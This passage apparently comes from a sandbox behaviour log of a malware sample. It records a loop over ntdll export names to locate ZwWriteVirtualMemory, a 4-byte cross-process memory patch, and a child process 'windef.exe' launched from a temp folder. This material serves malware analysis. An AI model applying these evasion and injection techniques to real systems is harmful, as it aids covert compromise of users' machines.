lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="CsrClientCallServer", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="CsrGetProcessId", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="DbgBreakPoint", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="DbgPrint", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="DbgPrintEx", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="DbgPrompt", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="DbgUiContinue", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="ZwWriteVirtualMemory") returned -1 [0145.410] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwEventEnabled", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwEventRegister", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwEventUnregister", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwEventWrite", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwEventWriteString", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="ZwWriteVirtualMemory") returned -1 [0145.411] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="EtwReplyNotification", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="EtwSendNotification", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="EtwSetMark", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="EtwTraceMessage", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="ZwWriteVirtualMemory") returned -1 [0145.412] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="LdrAccessResource", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="LdrAddRefDll", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="LdrEnumResources", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="LdrFindResource_U", lpString2="ZwWriteVirtualMemory") returned -1 [0145.413] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="ZwWriteVirtualMemory") returned -1 [0145.414] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0145.414] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="ZwWriteVirtualMemory") returned -1 [0145.414] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="ZwWriteVirtualMemory") returned -1 [0145.414] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="ZwWriteVirtualMemory") returned -1 [0145.414] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="ZwWriteVirtualMemory") returned -1 [0145.414] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="ZwWriteVirtualMemory") returned -1 [0145.414] lstrcmpA (lpString1="LdrGetDllPath", lpString2="ZwWriteVirtualMemory") returned -1 [0145.414] lstrcmpA (lpString1="LdrGetFailureData", lpString2="ZwWriteVirtualMemory") returned -1 [0145.414] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="ZwWriteVirtualMemory") returned -1 [0145.414] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="ZwWriteVirtualMemory") returned -1 [0145.414] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="ZwWriteVirtualMemory") returned -1 [0145.414] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="ZwWriteVirtualMemory") returned -1 [0145.414] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="ZwWriteVirtualMemory") returned -1 [0145.414] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="ZwWriteVirtualMemory") returned -1 [0145.414] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="ZwWriteVirtualMemory") returned -1 [0145.414] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="ZwWriteVirtualMemory") returned -1 [0145.414] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="ZwWriteVirtualMemory") returned -1 [0145.415] lstrcmpA (lpString1="LdrLoadDll", lpString2="ZwWriteVirtualMemory") returned -1 [0145.415] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="ZwWriteVirtualMemory") returned -1 [0145.415] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="ZwWriteVirtualMemory") returned -1 [0145.415] lstrcmpA (lpString1="LdrProcessInitializationComplete", lpString2="ZwWriteVirtualMemory") returned -1 [0145.415] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="ZwWriteVirtualMemory") returned -1 [0145.415] lstrcmpA (lpString1="LdrProcessRelocationBlockEx", lpString2="ZwWriteVirtualMemory") returned -1 [0145.415] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptions", lpString2="ZwWriteVirtualMemory") returned -1 [0145.415] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptionsEx", lpString2="ZwWriteVirtualMemory") returned -1 [0145.415] lstrcmpA (lpString1="LdrQueryImageFileKeyOption", lpString2="ZwWriteVirtualMemory") returned -1 [0145.415] lstrcmpA (lpString1="LdrQueryModuleServiceTags", lpString2="ZwWriteVirtualMemory") returned -1 [0145.415] lstrcmpA (lpString1="LdrQueryOptionalDelayLoadedAPI", lpString2="ZwWriteVirtualMemory") returned -1 [0145.415] lstrcmpA (lpString1="LdrQueryProcessModuleInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0145.415] lstrcmpA (lpString1="LdrRegisterDllNotification", lpString2="ZwWriteVirtualMemory") returned -1 [0145.415] lstrcmpA (lpString1="LdrRemoveDllDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0145.415] lstrcmpA (lpString1="LdrRemoveLoadAsDataTable", lpString2="ZwWriteVirtualMemory") returned -1 [0145.415] lstrcmpA (lpString1="LdrResFindResource", lpString2="ZwWriteVirtualMemory") returned -1 [0145.415] lstrcmpA (lpString1="LdrResFindResourceDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0145.416] lstrcmpA (lpString1="LdrResGetRCConfig", lpString2="ZwWriteVirtualMemory") returned -1 [0145.416] lstrcmpA (lpString1="LdrResRelease", lpString2="ZwWriteVirtualMemory") returned -1 [0145.416] lstrcmpA (lpString1="LdrResSearchResource", lpString2="ZwWriteVirtualMemory") returned -1 [0145.416] lstrcmpA (lpString1="LdrResolveDelayLoadedAPI", lpString2="ZwWriteVirtualMemory") returned -1 [0145.416] lstrcmpA (lpString1="LdrResolveDelayLoadsFromDll", lpString2="ZwWriteVirtualMemory") returned -1 [0145.416] lstrcmpA (lpString1="LdrRscIsTypeExist", lpString2="ZwWriteVirtualMemory") returned -1 [0145.416] lstrcmpA (lpString1="LdrSetAppCompatDllRedirectionCallback", lpString2="ZwWriteVirtualMemory") returned -1 [0145.416] lstrcmpA (lpString1="LdrSetDefaultDllDirectories", lpString2="ZwWriteVirtualMemory") returned -1 [0145.416] lstrcmpA (lpString1="LdrSetDllDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0145.416] lstrcmpA (lpString1="LdrSetDllManifestProber", lpString2="ZwWriteVirtualMemory") returned -1 [0145.416] lstrcmpA (lpString1="LdrSetImplicitPathOptions", lpString2="ZwWriteVirtualMemory") returned -1 [0145.416] lstrcmpA (lpString1="LdrSetMUICacheType", lpString2="ZwWriteVirtualMemory") returned -1 [0145.416] lstrcmpA (lpString1="LdrShutdownProcess", lpString2="ZwWriteVirtualMemory") returned -1 [0145.416] lstrcmpA (lpString1="LdrShutdownThread", lpString2="ZwWriteVirtualMemory") returned -1 [0145.416] lstrcmpA (lpString1="LdrStandardizeSystemPath", lpString2="ZwWriteVirtualMemory") returned -1 [0145.416] lstrcmpA (lpString1="LdrSystemDllInitBlock", lpString2="ZwWriteVirtualMemory") returned -1 [0145.416] lstrcmpA (lpString1="LdrUnloadAlternateResourceModule", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="LdrUnloadAlternateResourceModuleEx", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="LdrUnloadDll", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="LdrUnlockLoaderLock", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="LdrUnregisterDllNotification", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksum", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksumEx", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="LdrpResGetMappingSize", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="LdrpResGetResourceDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="MD4Final", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="MD4Init", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="MD4Update", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="MD5Final", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="MD5Init", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="MD5Update", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="NlsAnsiCodePage", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="NlsMbCodePageTag", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="NlsMbOemCodePageTag", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="NtAcceptConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0145.417] lstrcmpA (lpString1="NtAccessCheck", lpString2="ZwWriteVirtualMemory") returned -1 [0145.418] lstrcmpA (lpString1="NtAccessCheckAndAuditAlarm", lpString2="ZwWriteVirtualMemory") returned -1 [0145.418] lstrcmpA (lpString1="NtAccessCheckByType", lpString2="ZwWriteVirtualMemory") returned -1 [0145.418] lstrcmpA (lpString1="NtAccessCheckByTypeAndAuditAlarm", lpString2="ZwWriteVirtualMemory") returned -1 [0145.418] lstrcmpA (lpString1="NtAccessCheckByTypeResultList", lpString2="ZwWriteVirtualMemory") returned -1 [0145.418] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarm", lpString2="ZwWriteVirtualMemory") returned -1 [0145.418] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarmByHandle", lpString2="ZwWriteVirtualMemory") returned -1 [0145.418] lstrcmpA (lpString1="NtAddAtom", lpString2="ZwWriteVirtualMemory") returned -1 [0145.418] lstrcmpA (lpString1="NtAddAtomEx", lpString2="ZwWriteVirtualMemory") returned -1 [0145.418] lstrcmpA (lpString1="NtAddBootEntry", lpString2="ZwWriteVirtualMemory") returned -1 [0145.418] lstrcmpA (lpString1="NtAddDriverEntry", lpString2="ZwWriteVirtualMemory") returned -1 [0145.418] lstrcmpA (lpString1="NtAdjustGroupsToken", lpString2="ZwWriteVirtualMemory") returned -1 [0145.418] lstrcmpA (lpString1="NtAdjustPrivilegesToken", lpString2="ZwWriteVirtualMemory") returned -1 [0145.418] lstrcmpA (lpString1="NtAdjustTokenClaimsAndDeviceGroups", lpString2="ZwWriteVirtualMemory") returned -1 [0145.418] lstrcmpA (lpString1="NtAlertResumeThread", lpString2="ZwWriteVirtualMemory") returned -1 [0145.418] lstrcmpA (lpString1="NtAlertThread", lpString2="ZwWriteVirtualMemory") returned -1 [0145.418] lstrcmpA (lpString1="NtAlertThreadByThreadId", lpString2="ZwWriteVirtualMemory") returned -1 [0145.418] lstrcmpA (lpString1="NtAllocateLocallyUniqueId", lpString2="ZwWriteVirtualMemory") returned -1 [0145.418] lstrcmpA (lpString1="NtAllocateReserveObject", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAllocateUserPhysicalPages", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAllocateUuids", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAllocateVirtualMemory", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAlpcAcceptConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAlpcCancelMessage", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAlpcConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAlpcConnectPortEx", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAlpcCreatePort", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAlpcCreatePortSection", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAlpcCreateResourceReserve", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAlpcCreateSectionView", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAlpcCreateSecurityContext", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAlpcDeletePortSection", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAlpcDeleteResourceReserve", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAlpcDeleteSectionView", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAlpcDeleteSecurityContext", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAlpcDisconnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAlpcImpersonateClientContainerOfPort", lpString2="ZwWriteVirtualMemory") returned -1 [0145.419] lstrcmpA (lpString1="NtAlpcImpersonateClientOfPort", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtAlpcOpenSenderProcess", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtAlpcOpenSenderThread", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtAlpcQueryInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtAlpcQueryInformationMessage", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtAlpcRevokeSecurityContext", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtAlpcSendWaitReceivePort", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtAlpcSetInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtApphelpCacheControl", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtAreMappedFilesTheSame", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtAssignProcessToJobObject", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtAssociateWaitCompletionPacket", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtCallbackReturn", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtCancelIoFile", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtCancelIoFileEx", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtCancelSynchronousIoFile", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtCancelTimer", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtCancelTimer2", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtCancelWaitCompletionPacket", lpString2="ZwWriteVirtualMemory") returned -1 [0145.420] lstrcmpA (lpString1="NtClearEvent", lpString2="ZwWriteVirtualMemory") returned -1 [0145.421] lstrcmpA (lpString1="NtClose", lpString2="ZwWriteVirtualMemory") returned -1 [0145.421] lstrcmpA (lpString1="NtCloseObjectAuditAlarm", lpString2="ZwWriteVirtualMemory") returned -1 [0145.421] lstrcmpA (lpString1="NtCommitComplete", lpString2="ZwWriteVirtualMemory") returned -1 [0145.421] lstrcmpA (lpString1="NtCommitEnlistment", lpString2="ZwWriteVirtualMemory") returned -1 [0145.421] lstrcmpA (lpString1="NtCommitTransaction", lpString2="ZwWriteVirtualMemory") returned -1 [0145.421] lstrcmpA (lpString1="NtCompactKeys", lpString2="ZwWriteVirtualMemory") returned -1 [0145.421] lstrcmpA (lpString1="NtCompareObjects", lpString2="ZwWriteVirtualMemory") returned -1 [0145.421] lstrcmpA (lpString1="NtCompareTokens", lpString2="ZwWriteVirtualMemory") returned -1 [0145.421] lstrcmpA (lpString1="NtCompleteConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0145.421] lstrcmpA (lpString1="NtCompressKey", lpString2="ZwWriteVirtualMemory") returned -1 [0145.421] lstrcmpA (lpString1="NtConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0145.422] VirtualFree (lpAddress=0xa90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.435] NtProtectVirtualMemory (in: ProcessHandle=0x174, BaseAddress=0x19f078*=0x7ff6bac63980, NumberOfBytesToProtect=0x19f080, NewAccessProtection=0x4, OldAccessProtection=0x19f070 | out: BaseAddress=0x19f078*=0x7ff6bac63000, NumberOfBytesToProtect=0x19f080, OldAccessProtection=0x19f070*=0x20) returned 0x0 [0145.436] NtWriteVirtualMemory (in: ProcessHandle=0x174, BaseAddress=0x7ff6bac63980, Buffer=0x19f5b0*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x19f068 | out: Buffer=0x19f5b0*, NumberOfBytesWritten=0x19f068*=0x4) returned 0x0 [0145.436] NtProtectVirtualMemory (in: ProcessHandle=0x174, BaseAddress=0x19f078*=0x7ff6bac63000, NumberOfBytesToProtect=0x19f080, NewAccessProtection=0x20, OldAccessProtection=0x19f070 | out: BaseAddress=0x19f078*=0x7ff6bac63000, NumberOfBytesToProtect=0x19f080, OldAccessProtection=0x19f070*=0x4) returned 0x0 [0145.437] CloseHandle (hObject=0x17c) returned 1 [0145.437] CloseHandle (hObject=0x16c) returned 1 [0145.437] CloseHandle (hObject=0x174) returned 1 [0145.437] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=1) returned 1 Thread: id = 9 os_tid = 0xd18 Process: id = "3" image_name = "windef.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\windef.exe" page_root = "0x39bd0000" os_pid = "0x820" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xc80" cmd_line = "\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 683 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 684 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 685 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 686 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 687 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 688 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 689 start_va = 0x400000 end_va = 0x45dfff monitored = 1 entry_point = 0x4587be region_type = mapped_file name = "windef.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\windef.exe") Region: id = 690 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 691 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 692 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 693 start_va = 0x7fff0000 